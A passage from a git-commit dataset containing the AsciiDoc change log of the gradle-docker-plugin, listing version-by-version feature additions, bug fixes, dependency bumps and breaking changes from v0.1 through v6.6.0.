Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"042993aaf3860dfe9b6d3ebe24c3c90bb72ac064","subject":"Add changes to release notes","message":"Add changes to release notes\n","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"== Change Log\n\n[discrete]\n=== v6.6.0 (July 16, 2020)\n\n* Use configuration avoidance API in convention plugins - {uri-github}\/pull\/940[PR 940]\n* Configured registry credentials in build script should take precedence over Docker credential helper - {uri-github}\/pull\/945[PR 945]\n\n[discrete]\n=== v6.5.0 (July 3, 2020)\n\n* Default to Docker Hub when no registry is explicitly given - {uri-github}\/pull\/942[PR 942]\n* Upgrade of Docker Java library to version 3.2.5 and default to communication transport to Apache HttpClient 5 - {uri-github}\/pull\/942[PR 942]\n\n[discrete]\n=== v6.4.0 (March 23, 2020)\n\n* Keep the network name and network ID separate in `DockerCreateNetwork` - {uri-github}\/pull\/920[PR 920]\n* Upgrade ASM dependency to Java 13\/14-compatible version - {uri-github}\/pull\/929[PR 929]\n\n[discrete]\n=== v6.3.0 (March 14, 2020)\n\n* Retrieve all known credentials for `DockerBuildImage` custom task - {uri-github}\/pull\/913[PR 913]\n* Add support for setting custom workingDir in `DockerExecContainer` task - {uri-github}\/pull\/927[PR 927]\n\n[discrete]\n=== v6.2.0 (March 10, 2020)\n\n* Upgrade Docker Java to next minor version - {uri-github}\/pull\/925[PR 925]\n* Expose property for providing extra hosts - {uri-github}\/pull\/926[PR 926]\n\n[discrete]\n=== v6.1.4 (February 23, 2020)\n\n* Nested property `FileInstruction.getFile()` renders warning as it doesn't provide input or output annotation - {uri-github}\/issues\/919[Issue 919]\n\n[discrete]\n=== v6.1.3 (January 26, 2020)\n\n* Credentials helper JSON output parsing falls back to default if it cannot be read properly - {uri-github}\/pull\/909[PR 909]\n\n[discrete]\n=== v6.1.2 (January 14, 2020)\n\n* Decode base64 auth header - {uri-github}\/pull\/902[PR 902]\n\n[discrete]\n=== v6.1.1 (December 12, 2019)\n\n* Add debug logging in Docker configuration parsing - {uri-github}\/pull\/898[PR 898]\n\n[discrete]\n=== v6.1.0 (December 12, 2019)\n\n* Allow configuring the main class name for convention plugins - {uri-github}\/pull\/892[PR 892]\n* Do not parse config file if it doesn't exist - {uri-github}\/issues\/887[Issue 887]\n\n[discrete]\n=== v6.0.0 (November 16, 2019)\n\n* **Breaking Change!** Multi-tag support for push operation and convention plugins - {uri-github}\/pull\/867[PR 867]\n* **Breaking Change!** Renamed property `tags` to `images` for extensions `DockerJavaApplication` and `DockerSpringBootApplication`.\n* **Breaking Change!** Renamed property `tag` to `image` for custom tasks `DockerBuildImage`, `DockerCommitImage`, `DockerPullImage`, `DockerSaveImage`, `DockerListImages`,`DockerCreateContainer`.\n* **Breaking Change!** Removal of method `DockerPullImage.getImageId()`. Use `DockerPullImage.getImage()` instead.\n* **Breaking Change!** Host-related configuration properties in `DockerCreateContainer` have been moved to nested property for better maintainability - {uri-github}\/pull\/873[PR 873]\n* Add properties `ipcMode` and `sysctls` to `DockerCreateContainer` - {uri-github}\/pull\/862[PR 862]\n* Gradle 6.0 compatibility fixes - {uri-github}\/pull\/869[PR 869]\n* Improve DSL for configuring registry credentials for custom tasks - {uri-github}\/pull\/879[PR 879]\n* Plugin resolves and uses Docker credential helper - {uri-github}\/pull\/865[PR 865]\n* Upgrade of Docker Java library to version 3.1.5\n\n[discrete]\n=== v5.3.0 (October 30, 2019)\n\n* Expose project-prop\/sys-prop\/env-var to optionally use netty-exec-cmd-factory - {uri-github}\/pull\/876[PR 876]\n\n[discrete]\n=== v5.2.0 (October 5, 2019)\n\n* **Potentially Breaking Change!** Remove duplicated code in convention plugins - {uri-github}\/pull\/864[PR 864]\n* Restore compatibility with Gradle 5.1 as runtime version - {uri-github}\/issue\/866[Issue 866]\n\n[discrete]\n=== v5.1.0 (September 18, 2019)\n\n* **Potentially Breaking Change!** Remove remaining use of Application Plugin in convention plugins - {uri-github}\/pull\/852[PR 852]\n\n[discrete]\n=== v5.0.0 (August 13, 2019)\n\n* **Breaking Change!** Remove exec\/cmd hooks in Docker application plugin - {uri-github}\/pull\/806[PR 806]\n* **Breaking Change!** API cleanup of Dockerfile task - {uri-github}\/pull\/812[PR 812]\n* **Breaking Change!** Removed `ItemJoiner` from public API - {uri-github}\/pull\/836[PR 836]\n* Respect symlinks in build context - {uri-github}\/issue\/837[Issue 837]\n\n[discrete]\n=== v4.10.0 (June 12, 2019)\n\n* Expose `target` property for BuildImageTask - {uri-github}\/pull\/813[PR 813]\n* Remove final from DockerBuildImage.labels property - {uri-github}\/pull\/823[PR 823]\n* Always set imageId within DockerBuildImage on success - {uri-github}\/pull\/819[PR 819]\n\n[discrete]\n=== v4.9.0 (May 25, 2019)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is not inject into the method `runRemoteCommand` anymore - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications 